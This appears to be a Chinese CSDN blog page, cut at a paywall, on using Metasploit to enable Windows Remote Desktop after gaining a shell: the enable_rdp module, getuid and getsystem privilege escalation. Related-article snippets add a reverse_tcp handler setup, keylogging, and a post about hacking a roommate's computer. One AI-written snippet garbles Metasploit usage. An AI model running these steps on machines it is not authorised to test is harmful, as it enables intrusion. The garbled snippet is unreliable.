msf拿下windows的远程桌面

mulincong

已于 2023-06-06 16:09:24 修改

阅读量1k

点赞数

分类专栏：网络安全渗透文章标签：服务器运维

于 2023-05-25 18:40:47 首次发布

本文链接：https://blog.csdn.net/mulincong/article/details/130871847

版权

本文介绍了如何在获取shell后，通过检查远程桌面服务、提升权限，最终成功开启3389端口并创建新账号实现远程桌面登录的过程。涉及到的步骤包括使用netstat检查端口、尝试enable_rdp、非管理员权限提权及创建新用户等。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

1、拿下shell后查看远程桌面有没有开启

使用netstat -nao 我们可以看到windows靶机并没有开启rdp端口，因此无法连接

2、直接使用run post/windows/manage/enable_rdp看能否开启远程桌面3389端口
run post/windows/manage/enable_rdp

3、发现无法开启，权限问题，可以使用getuid查看是否是管理员，发现非管理员账号

4、提权

先使用getsystem看能否提权,

getsystem工作原理：
getsystem创建一个新的Windows服务，设置为SYSTEM运行，当它启动时连接到一个命名管道。
getsystem

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

mulincong

关注关注

0
点赞
踩
2

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

【神兵利器】——187、MSF远程桌面

Fly_鹏程万里

10-16

198

在渗透测试中如果我们获取到了目标服务器的权限，此时我们可以考虑查看当前服务器是否有开启远程桌面，如果有开启远程桌面则可以通过图形化界面的方式进行远程操作，更加便捷，更加迅速，如果没有开启远程桌面，那么我们可以通过获取到的shell来执行命令开启远程桌面，随后进行利用。

[权限维持] Windows 权限维持 —— 影子账户后门 - 克隆账户

最新发布

Blue17 の小窝

02-28

837

问题描述分别在Windows和Linux操作系统上安装Metasploit软件，并运行Metasploit完成针对Linux靶机usermap_script漏洞的渗透攻击，尝试使用植入VNC图形化远程控制工具的攻击载荷，成功获得Linux靶机上的远程控制桌面。做权限维持的前提是你已经拿到了靶机的一个权限（一般还是高权限，不然部分后门你还没有权限写入），所以我们得先用攻击机生成一个木马文件，上传靶机后运行，先拿到靶机的一个权限。这部分我们站在防守者视角，来排查下高级款的影子账户后门。

1 条评论您还未登录，请先登录后发表或查看评论

今天简单黑一下室友电脑：MSF提权开启远程桌面并连接

kjuhfkicf154的博客

01-04

3762

今天简单黑一下室友电脑~

用Kali Linux自带的MSF远控windows系统

2301_79704866的博客

02-18

1121

这时候可以输入我们想要控制靶机的命令。虽然控制的是windows平台，但是指定要用Kali的。还有就是这个木马并没有生成一个永久后门，所以关机或者重启之后，如果他不再重新点击这个木马，木马将不再生效。本人也是纯小白，求大佬指导怎么生成永久后门，就是只要一开机就启动木马的那种（求求了。1.虚拟机（攻击机）Kali Linux2023。首先用攻击机生成一个windows平台的木马。3.虚拟机（靶机2）windows 10。2.虚拟机（靶机1）windows 7。

记一次完整体系的攻防演练的环境部署-映射公网-渗透getshell-上线frp-上线MSF实现内网远程渗透-打开远程桌面。

随心所欲不逾矩

02-27

946

前言，本次笔记是记录在工作中的一个攻防演练环境搭建和通过部署的应用存在的文件上传漏洞getshell，接着上线frp，接着上线msf，实现msf远程渗透。准备工作：1，在客户的内网环境部署一个Windows7系统，在这个系统上把finecms这个应用部署上去。把finecms安装之后，和客户沟通，把这个应用的地址映射到公网上去。2，其次，没有条件的话，自己在在wmware上装个虚拟机部署上去也行。

[ MSF使用实例 ] 利用远程桌面代码执行漏洞(MS12-020)漏洞导致windows靶机蓝屏

qq_51577576的博客

08-27

1602

Metasploit是一个免费的、可下载的框架，通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时，计算机安全状况也被永久性地改变了。仿佛一夜之间，任何人都可以成为黑客，每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。后续会有专门的文章介绍MSF，这里只是一个实例，就不多讲了。...

MSF远程登录实验

坏坏-5的博客

04-13

3751

本篇是关于使用MSF工具远程控制桌面实验笔记！

最详细利用kali的msf进行CVE-2019-0708漏洞复现

qq_43331608的博客

10-03

2万+

CVE-2019-0708 技术无罪，请勿用于恶意用途，出事本人不负一切责任 0.漏洞背景 Windows再次被曝出一个破坏力巨大的高危远程漏洞CVE-2019-0708。攻击者一旦成功利用该漏洞，便可以在目标系统上执行任意代码，包括获取敏感信息、执行远程代码、发起拒绝服务攻击等等攻击行为。而更加严重的是，这个漏洞的触发无需用户交互，攻击者可以用该漏洞制作堪比2017年席卷全球的WannaCry类...

Redis未授权漏洞复现及利用（window,linux）

热门推荐

dreamthe的博客

03-22

2万+

1.了解redis Redis（Remote Dictionary Server )，即远程字典服务，是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库，并提供多种语言的API。从2010年3月15日起，Redis的开发工作由VMware主持。从2013年5月开始，Redis的开发由Pivota赞助。 2.redis漏洞原理 Redis默认情况下是绑定在0.0.0.0:6379端口的，如果没有设置密码（一般密码为空）或者密码为弱密码的情况下并且也没有

渗透系列：红日靶场(vulnstack)一超全面详细的渗透测试学习笔记（拿下win2008s）

weixin_54626591的博客

01-18

466

红日靶场(vulnstack)一超全面详细的渗透测试学习笔记（拿下win2008s）

使用MSFPC远程控制

y3174445239的博客

06-24

743

切换为root用户之后，可以对安卓机进行最大权限的控制，比如关闭selinux、读取文件等。按目标系统分：Windows、Androd、iOS、各种版本的Linux操作系统。Netcat工具的使用：（以Metasploitable 2的80端口为例进行测试）2、输入shell，执行各种命令，如查看操作系统信息、切换到root用户等。按连接方式分：正向、反向（注意：现在大都采用反向远程控制方式）5、打开cmd执行各种命令，如查看文件夹内容、操作系统信息、关机。（2）在安卓虚拟机中弹出提示信息，选择“允许”。

【渗透实战】通过msf模块获取win7主机远程shell

yummy11111的博客

03-25

1294

渗透学习

如何正确的远程控制windows sever桌面，msf拿到cmd后运行程序出现“交互式服务检测”解决方案

qq_62931346的博客

07-13

314

利用永恒之蓝拿到windowsshell后尝试执行某些功能，但是多次尝试均发现windows任务栏会出现一个名为"交互式服务检测"的窗口，我们执行的命令(如弹计算器)均会在该窗口内的桌面执行。找到目录为Administrator(当前登陆用户名)的进程，记下进程id。拿到的shell所在进程的pid和当前win桌面进程的pid不相同。再次尝试执行进程(弹计算器)

Metasploit msfd插件实现远程访问msf

ropin_os的专栏

03-18

4191

linux下： //进入msfd sudo msfd //打开连接 msfd -a -P //查看端口是否打开 netstat -tn //远程连接msf nc windows下：//打开连接 msf> load msfd ServerName=你的IP地址 ServerPort=你的端口 //查看连接 netstat -na //访问使用telnet telnet window下可能会出现乱码，这里推荐使用一款开源的软件 putty，附上简单的使用说

开启目标远程桌面服务方法总结

Kevin's Blog

11-12

6209

文章目录一、目的二、CMD之远程桌面服务2.1 查看远程桌面是否开启2.2 确认远程端口号是否默认2.3 确认远程桌面服务状态2.4 WMIC开启/关闭远程桌面（推荐）2.5 更改远程桌面端口（附）三、MSF开启目标远程桌面3.1 在MSF shell中开启远程桌面（推荐）3.1.1 优 / 缺点3.1.2 启动远程桌面前前期工作3.1.3 MSF shell中使用WMIC启动3.2 使用MSF enable_rdp模块3.2.1 优 / 缺点3.2.2 Meterpretr enable_rdp模块中启

使用Meterperter会话获取目标屏幕与键盘记录

sGanYu

09-09

2681

使用MS08-067漏洞开启·Meterpreter会话截图目标主机使用screenshot命令获取目标截图，这里是被默认保存至/root/桌面/ijROqnkE.jpeg 使用sysinfo即可获取系统运行的平台获取目标主机键盘记录先使用ps命令查看运行在目标系统的进程，获得system、cmd.exe、explorer.exe等在内的数十个进程输入migrate命令将meterpreter会话迁移至explorer.exe（1384）进程中 ...

Msf命令详解

weixin_53747497的博客

04-10

2536

portfwd - 将本地端口转发到远程服务例如：portfwd add -l 1122 -p 3389 -r 192.168.250.176把目标主机192.168.250.176的3389端口转发到1122端口。search - 在目标主机文件系统上查找搜索文件例如：search -d c:\ -f *.doc 在目标主机C盘下搜索doc文档 show_mount - 列出所有装载点/逻辑驱动器。

windows光标_windows下打造漂亮的msf

weixin_34791959的博客

01-02

229

windows安装kali子系统首先需要在windows下安装kali子系统。打开windows设置，选择更新和安全 ====> 开发者选项，选择开发人员模式。接着打开控制面板 ====> 程序 ====> 启用或关闭Windows功能，勾选适用于Linux的Windows子系统然后打开Microsoft Store 搜索 kali 或者 ubuntu都可以安装完成后会...

metasploit（MSF）渗透超细解说 -- 小黑渗透工具

G_WEB_Xie的博客

05-18

2193

metasploit Framework（msf）里带数千个已知的软件漏洞，并保持持续更新，Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程，采用Ruby语言编写。黑掉整个宇宙的称号！！！初心：记录msfconsole的渗透测试流程，以及每个流程点常用到的一些命令，其中还有一些不足的地方大家可以指出来，我会在本博客中添加补充，也会将大家的名字备注在补充的章节内！！一起加油 ^-^本章出后后续会出实战测试，也会将win和linux常用命令做一期更新。

msf上线windows

10-23

Msf（Metasploit Framework），是一个广泛使用的渗透测试框架，它提供了一系列工具来攻击并控制远程系统，包括Windows系统。在MSF中，上线Windows的目标通常是利用漏洞、利用已知的exploit（漏洞利用程序）对Windows系统进行控制。要将Msf用于Windows上线（也称为Meterpreter的payload生成），你需要做以下几个步骤： 1. **选择目标平台**：首先在Metasploit Console中输入`use exploit/multi/handler`，然后选择一个适用于Windows的exploit模块，如`exploit/windows/x64/local/shell_reverse_tcp`。 2. **配置payload**：设置适当的参数，例如目标IP地址、端口以及shell类型（如powershell或cmd）。例如： ``` set payload windows/x64/meterpreter/reverse_tcp set LHOST <your_lhost> set LPORT <your_lport> ``` 3. **生成Payload**：输入`run`命令生成特制的Shellcode，这将会被发送到目标机器上运行。 4. **执行Exploit**：如果条件允许，可以利用网络监听或者手动进行攻击，将生成的Shellcode注入到Windows系统中，触发Meterpreter连接。 5. **Meterpreter Session**：一旦成功，Msf会创建一个新的Meterpreter session，你可以通过这个session进行后续的管理和操作。